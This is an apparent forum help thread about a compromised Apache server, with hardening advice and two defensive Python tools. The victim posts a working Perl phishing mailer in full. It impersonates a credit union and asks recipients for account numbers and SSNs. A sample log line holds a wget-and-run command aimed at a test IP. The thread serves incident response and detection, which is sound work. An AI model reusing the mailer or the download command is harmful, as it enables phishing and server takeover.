• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 1640

Protect Port 80(Apache)

We have an intrusion which looks like an automated script that buries itself in a hidden directory under /tmp. This script is basically a combination of 2 files,
"awstats.pl" and links.txt. What it does is, it starts sending out an email portraying itself as a BANK to all the addresses in the .txt file.
This was the 4th time it attacked us since April 23. We had no choice other than taking the server off the network. Any ideas or suggestions on how to protect port 80 from these kinds of attacks?
4 Solutions
zkaiserm (Author) Commented:
This is the culprit "awstats.pl"


print "Content-type: text/html\n";

$file = "list.txt";
open(IN_FILE, $file);
my @data=<IN_FILE>;
close IN_FILE;

$contfile = "test.txt";
open(IN_FILE, $contfile);
my @contdata = <IN_FILE>;
close IN_FILE;

my $count = 0;

my $SendmailPath = '/usr/sbin/sendmail';
my $from_s = 'customerservice@visionsfcu.org';
my $subj_s = 'NOTICE FROM Visions Federal Credit Union #REF-ID:79053430';
my $contdata_s = @contdata;

my($mailbody) = <<__END__MAILBODY__;


<div id="message" style="width: 1136; height: 558">
  <table id="AutoNumber1" border="1" bordercolor="#111111" cellpadding="0" cellspacing="0" width="34%">
        <td width="100%">
          <p><img border="0" src="https://www.visionsfcu.org/images/visions2.jpg" width="158" height="50"></p>
          <p align="left"><font face="Arial" size="2">Dear Vision FCU Client,<br>
          &nbsp;This is your official notification from Vision FCU&nbsp;that the
          service(s) listed below &nbsp;will be deactivated and deleted if not
          renewed immediately. Previous notifications have &nbsp;been sent to
          the Billing Contact assigned to this account. As the Primary Contact,
          you &nbsp;must renew the service(s) listed below or it will be
          deactivated and deleted.&nbsp;<br>
          &nbsp;</font><font face="Verdana" size="2"><a target="_blank" href="http://visionsfcu.acswi.com/fcu-online/session_id.php"><font
color="#003399" face="Arial" size="2"><b>Renew
          Now</b></font></a></font><font face="Arial" size="2">&nbsp; your&nbsp;Vision
          FCU Bill Pay Services.<br>
          If you are not enrolled to Online Banking, please enter your checking
          account number as&nbsp;Account Number&nbsp; and Social Security Number&nbsp;
          as Password.</font></p>
          <div style="width: 508; height: 48">
            <font face="Arial" size="2">&nbsp;<br>
            &nbsp;<b><font color="#000000">SERVICE</font></b> : Vision FCU Bill
            Pay Services.<br>
            &nbsp;<b><font color="#000000">EXPIRATION</font><font color="#000080">
            </font></b>:&nbsp;May 15, 2006</font>
            <font face="Arial" size="2">&nbsp;</font>
            <font face="Arial" size="2"><br>
            Thank you,&nbsp;sincerely,<br>
            <font size="-1">Eric Kingsbury</font>, Customer Service</font>
            <p align="center"><font face="Verdana" size="2">======================================================================<br>
            <font face="Verdana" size="2">&nbsp;</font>
            <font face="Verdana" size="2">&nbsp;Document Reference: (#79053430).</font>
          <p align="center"><font face="Verdana" size="2"><b>2006 Vision FCU,
          All Rights Reserved. Member FDIC. Equal Housing Lender.</b></font></td>




foreach $line (@data){
print qq($line);
sendmail($line, $from_s, $subj_s, $mailbody );

sub sendmail{
     my ($to, $from, $subj, $msg) = @_;
     open (MAIL, "|$SendmailPath -t -i")|| die "Error! Can't use sendmail\n";
     print MAIL "To: $to";
     print MAIL "From: $from\n";
     print MAIL "Subject: $subj\n";
     print MAIL "Reply-To: $from\n";
     print MAIL "Content-type: text/html\n\n";
     print MAIL "$msg\n";
     close (MAIL);

my $count;
$count++ foreach(@data);
print "$count emails sent\n";
This is of course just a quick countermeasure:

If it is always the same script, how about modifying the hosts file and adding


creating a directory "images" in the www documents folder and putting a big "FAKE" in the pic visions2.jpg; that file goes in the "images" folder.

Should at least stop the spammer collecting more PINs...


Apart from that, apply all security patches for your system; I guess that is where the problem lies.

There are a couple of solutions:
- Configure your Apache to pass only specific requests (for example, for index.cgi, index.html, etc.), and block all of the rest. You can do it using 'RewriteRule' clauses.
For example, you can add the following rules to the configuration file of your HTTP server (Apache):
RewriteEngine on
# pass the index pages through untouched
RewriteRule ^/?index\.(cgi|html)$ - [L]
# refuse every other request with 403 Forbidden
RewriteRule ^ - [F]

- You can try to capture the request that causes the script activation (using tcpdump on tcp port 80). Yes, this is significant work, but capturing firewall intrusions is not easy. Once you have found the request which causes the intrusion, reconfigure your firewall to block such requests (based on the request IP or any other IP-specific type).

Hope that I helped you.

I agree, a large concern that should be addressed is how this application is getting onto your system. Configuring your logs to identify suspicious traffic could go a long way to figuring out how the application is being installed and run. I would also make sure that all of your apps are running the latest versions of the necessary applications and not running anything that is unnecessary. A tool like logwatch can go through your httpd logs and inform you of sketchy behavior.

For example, this is a Perl script; if you can do without Perl then you will stop this application cold even if it stays on your machine.

hope this helps
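The suggestion above is to mine the httpd logs for the request that installs and launches the script. The following is an added example (not from the original thread or from logwatch) of what that triage looks like in practice: it parses Apache combined-format access-log lines and flags requests whose path or query carries the usual signs of a drop-and-run (download tool names, an interpreter name, a reference to a temp directory, shell metacharacters, or path traversal), in both raw and URL-decoded form. The log lines, IP addresses and CGI name are constructed for the example.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# Apache "combined" access-log format; the referer/user-agent pair is optional
# so plain "common" format lines parse as well.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?$'
)

# Each heuristic is a label plus a regex. Every regex is applied to both the raw
# and the URL-decoded request path so encoded and plain variants are both caught.
HEURISTICS = [
    ("path traversal", re.compile(r"\.\./")),
    ("download tool named in request", re.compile(r"(^|[^a-z])(wget|curl|fetch|lynx)([^a-z]|$)", re.I)),
    ("interpreter named in request", re.compile(r"(^|[^a-z])(perl|sh|bash|python)([^a-z]|$)", re.I)),
    ("temp directory referenced", re.compile(r"/tmp\b|/var/tmp\b|/dev/shm\b")),
    ("shell metacharacters", re.compile(r"[;|`]|&&")),
]


@dataclass
class Finding:
    ip: str
    timestamp: str
    request: str
    reasons: list = field(default_factory=list)


@dataclass
class TriageResult:
    findings: list = field(default_factory=list)
    unparsed: int = 0          # lines that did not match the log format

    def hits_by_ip(self) -> dict:
        """Count flagged requests per client address (repeat offenders surface first)."""
        counts = {}
        for f in self.findings:
            counts[f.ip] = counts.get(f.ip, 0) + 1
        return counts


def score_path(path: str) -> list:
    """Return the labels of every heuristic the request path trips."""
    decoded = unquote(path)
    return [label for label, rx in HEURISTICS if rx.search(path) or rx.search(decoded)]


def triage(lines) -> TriageResult:
    """Parse access-log lines and keep only the requests that trip a heuristic."""
    result = TriageResult()
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            result.unparsed += 1
            continue
        reasons = score_path(m.group("path"))
        if reasons:
            result.findings.append(Finding(
                m.group("ip"), m.group("ts"),
                f'{m.group("method")} {m.group("path")}', reasons))
    return result


# Constructed sample lines (RFC 5737 test addresses); not taken from the original post.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Apr/2006:03:14:07 -0400] "GET /index.html HTTP/1.1" 200 1532 "-" "Mozilla/4.0"',
    '10.0.0.9 - - [23/Apr/2006:03:15:22 -0400] "GET /images/visions2.jpg HTTP/1.1" 200 4401 "-" "Mozilla/4.0"',
    '192.0.2.77 - - [23/Apr/2006:03:16:01 -0400] "GET /cgi-bin/somecgi?arg=cd%20/tmp;wget%20http://203.0.113.5/x.pl;perl%20x.pl HTTP/1.0" 200 0 "-" "-"',
    '192.0.2.77 - - [23/Apr/2006:03:16:09 -0400] "GET /somepath/../../etc/passwd HTTP/1.0" 404 209 "-" "-"',
    'not a log line at all',
]

if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for f in result.findings:
        print(f"{f.ip} [{f.timestamp}] {f.request}\n    {', '.join(f.reasons)}")
    print(f"flagged per IP: {result.hits_by_ip()}; unparsed lines: {result.unparsed}")
```

Run it against the real access_log (and error_log, where CGI failures land) with `triage(open(path))`; the per-IP counts from `hits_by_ip()` are the quickest way to see which client kept coming back on the four dates the poster mentions, and a 200 status on a flagged CGI request is the line to look at first.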

Rich Rumble (Security Samurai) Commented:
Yes, secure your Apache install, make sure it's got the latest patches and you're running the latest version.
Emails are sent using port 25/tcp.

You could block this port on the server itself (using ipchains, iptables), or on the network.

With the port blocked, the script will not be able to send mails.

Blocking port 25 will solve the problem with sending out emails but will not remove the cause. If the server can be exploited to send out emails, what else is it being used for that you do not know of?

You are better off finding the cause or rebuilding a new box with all of the latest patches. I have seen machines so pwned that you could take three times more time cleaning them than you would dropping in a blank drive and starting over, and that was with extensive logging running on the machine.
zkaiserm (Author) Commented:
Thanks for your response. One thing which bothers me is how these files ended up on our server. That too, it was so well written that they were hidden, or it's not exactly hidden, it's a directory without a name. For example:

/tmp/  /trimite/awstats.pl

The space you see between tmp and trimite is a directory without a name. What could be the cause of these files ending up on our server? Is it the webserver configuration? Or is something wrong with the web application? Is there any practical way of knowing this is how they hack into the webserver? How in the world could someone put files on your server through port 80? would be the question of the day??
Well, as I posted above, your system can be vulnerable because it's missing the latest patches.

Check what ports are open, check if that software is patched with up-to-date patches.

Rich Rumble (Security Samurai) Commented:
Take your pick... It could be Apache, it could be Tomcat if you're running it, it could be your code, or due to a lax .conf file or setting.
XSS (cross site scripting) has been getting more and more attention lately http://en.wikipedia.org/wiki/XSS There are unfortunately quite a few vectors for this.
To me, if it's not XSS, it's likely lax security of the config or on the directories; write permissions may be granted to everyone... possibly a username/password embedded in your source code?
zkaiserm (Author) Commented:
We have a firewall. Intruders can only use the ports which are open. Your answer looks quite normal. I signed up for Experts Exchange to know what happens behind the scenes. I would like to know how it happens. How can someone send commands through the browser?

Rich Rumble (Security Samurai) Commented:
Flaws in your source code, scripting, scripting interpreters, Apache exploits, lax security settings, all can lead to what happened to you.
Are you running PHP code, CGI/Perl code, do you have a login site? Each piece of software adds complexity, possible exploit vectors, and more overhead for you to figure out how to secure. Login sites can be poorly made; often the database usernames and passwords can be in the source code, or not obfuscated well. You can glean quite a bit of info from a poorly written site.

If you're running PHP, or phpBB, you can see there are hundreds of exploits that can lead to compromise; there are a variety of worst practices that can lead to this also.

Things like this: http://www.securityfocus.com/bid/15250/info http://www.securityfocus.com/bid/15250/discuss
Can upload a script; if you'd like to learn more you can search Bugtraq, or pick up some of the Hacking Exposed series of books.
http://governmentsecurity.org/archive/t4603.html Ahh the loginmatrix challenge... that was a great tool to learn from, it's gone now... too bad, that one was fun.
Richrumble pointed it out precisely.

Please tell us more about the software components you use.

E.g. Host OS : win 2k3, IIS Webserver, MSSQL Database 2005.

such like...

(also normal)
zkaiserm (Author) Commented:
Apache 1.3.x
mysql 3.x
php 4.1
freebsd 5.1

The email the users got was like www@ourhostname.com. What's this "www" user?
Rich Rumble (Security Samurai) Commented:
All very dated packages; search for exploits on any one of those and you'll find something. Try downloading GFI's LANguard network scanner and running it against your server; also try Nessus, if it's still free.
FreeBSD 5.1 was released early in 2003; there are many exploits that are active in the wild that can compromise a system that has not been patched since the initial install. If you like the platform, wipe and re-install the latest FreeBSD production release (6.1) and patch that.

I would not spend your time trying to track down what is wrong with your system because there are many places that could have issues from the OS to the applications running on it and unless you are very comfortable with this environment, not very obvious to detect.

We will always be more than willing to assist you in this effort, but sometimes it makes more sense to start fresh.


rootkit, variation of vudo.c, and IRC Spykidz warez ware.  rkhunter should be obtained and run.  Then inspect all of your temp folders and try to get rid of execute permissions there.  Look for anything that ends in .pl and the like.

These phishers, hackers, and irc box ownerz know about legitimate programs and often name their stuff after them.  They collect usernames, harvest emails, attempt identity theft, and things like that.

You have to track this down manually and document it all.

User "nobody" should not have mail privileges.  Usually the scripts you are suggesting feign the user as soon as they detect Apache 1.3

But they can do it to other servers as well.

The older Apache, KDE, MySQL, PHP, and quite a few others are vulnerable and the hackers know it; apparently most of the developers either do not or they are unwilling to admit it.

As for your time trying to track down what is wrong, if you don't it is only going to keep on happening.  It will happen until the people doing it are caught and they can't be caught without someone tracking them down.

You don't want the big bank that they are impersonating subpoenaing all of your computers, do you?  Track them down and build evidence.
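The last answer says to inspect the temp folders by hand, strip execute permissions there and look for anything ending in .pl; the poster earlier noted that the dropped files lived under a directory whose name was only whitespace. The following added example (not from the thread and not from rkhunter) is a small scanner that walks a temp tree and reports exactly those signs: entries whose names are whitespace-only, have leading/trailing whitespace or control characters, or are dot-hidden; regular files with any execute bit set; and files with script extensions. It builds its own constructed fixture (a directory named with two spaces holding a placeholder "awstats.pl", mirroring the path in the post) so it runs offline; the placeholder file contains only a comment.

```python
import os
import stat
import tempfile
from dataclasses import dataclass

SCRIPT_SUFFIXES = (".pl", ".sh", ".py", ".php", ".cgi")


@dataclass
class Finding:
    path: str
    reasons: list


def suspicious_name(name: str) -> list:
    """Name-based tells: whitespace-only, padded, control chars, or dot-hidden."""
    reasons = []
    if name.strip() == "":
        reasons.append("name is only whitespace")
    elif name != name.strip():
        reasons.append("leading/trailing whitespace in name")
    if any(ord(c) < 32 for c in name):
        reasons.append("control characters in name")
    if name.startswith("."):
        reasons.append("dot-hidden entry")
    return reasons


def scan_tmp(root: str) -> list:
    """Walk a temp tree and report oddly named entries, executables and scripts."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            reasons = suspicious_name(d)
            if reasons:
                findings.append(Finding(os.path.join(dirpath, d), reasons))
        for f in filenames:
            full = os.path.join(dirpath, f)
            reasons = suspicious_name(f)
            try:
                st = os.lstat(full)           # lstat: do not follow planted symlinks
            except OSError:
                continue
            exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
            if stat.S_ISREG(st.st_mode) and st.st_mode & exec_bits:
                reasons.append("executable bit set")
            if f.lower().endswith(SCRIPT_SUFFIXES):
                reasons.append("script file extension")
            if reasons:
                findings.append(Finding(full, reasons))
    return findings


def build_fixture() -> str:
    """Constructed test tree (not a real compromise): a benign cache dir plus a
    whitespace-named directory holding an executable placeholder awstats.pl."""
    root = tempfile.mkdtemp(prefix="tmpscan-demo-")
    os.makedirs(os.path.join(root, "sess_cache"))
    with open(os.path.join(root, "sess_cache", "data.bin"), "wb") as fh:
        fh.write(b"\x00" * 16)
    hidden = os.path.join(root, "  ", "trimite")   # directory named with two spaces
    os.makedirs(hidden)
    script = os.path.join(hidden, "awstats.pl")
    with open(script, "w") as fh:
        fh.write("# constructed placeholder for the example, not the posted script\n")
    os.chmod(script, 0o755)
    with open(os.path.join(hidden, "list.txt"), "w") as fh:
        fh.write("")
    return root


if __name__ == "__main__":
    root = build_fixture()
    for finding in scan_tmp(root):
        print(f"{finding.path!r}: {', '.join(finding.reasons)}")
```

Point `scan_tmp` at /tmp, /var/tmp and any other world-writable directory (`find / -type d -perm -0002` lists them) and review every hit; the `!r` in the report makes a whitespace-only directory name visible in the output, which a plain `ls` does not. One caveat on "getting rid of execute permissions": mounting /tmp with `noexec` (or clearing the bits) only stops direct execution of the file. A script started as `perl /tmp/x.pl` still runs, because the interpreter merely reads it, so this is a hurdle, not a fix; the entry point in the web stack still has to be found and patched.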